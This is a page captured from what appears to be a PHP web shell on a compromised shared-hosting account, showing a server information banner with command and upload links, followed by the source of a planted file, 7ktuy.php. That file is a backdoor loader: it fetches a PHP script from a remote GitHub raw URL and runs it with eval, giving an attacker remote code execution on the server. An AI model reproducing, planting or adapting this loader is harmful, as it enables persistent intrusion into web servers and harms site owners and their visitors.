|
Server IP : 198.54.120.203 / Your IP : 216.73.216.181 Web Server : LiteSpeed System : Linux premium58.web-hosting.com 4.18.0-553.58.1.lve.el8.x86_64 #1 SMP Fri Jul 4 12:07:06 UTC 2025 x86_64 User : greakqsw ( 1698) PHP Version : 8.3.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/greakqsw/theblogginglab.org/x701wm-20260310091359/../1j67kd/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
7ktuy.php 0000644 00000001072 15153032407 0006340 0 ustar 00 <?php
$url = 'https://raw.githubusercontent.com/laolierzi-commits/phpbd/refs/heads/main/ws.php';
$context = stream_context_create([
'http' => [
'follow_location' => 1,
'timeout' => 10,
'ignore_errors' => true
],
'ssl' => [
'verify_peer' => true,
'verify_peer_name' => true
]
]);
$handle = @fopen($url, 'r', false, $context);
$content = $handle ? stream_get_contents($handle) : '';
if ($handle) fclose($handle);
if (!empty($content)) {
eval('?>' . $content);
} else {
echo "X";
}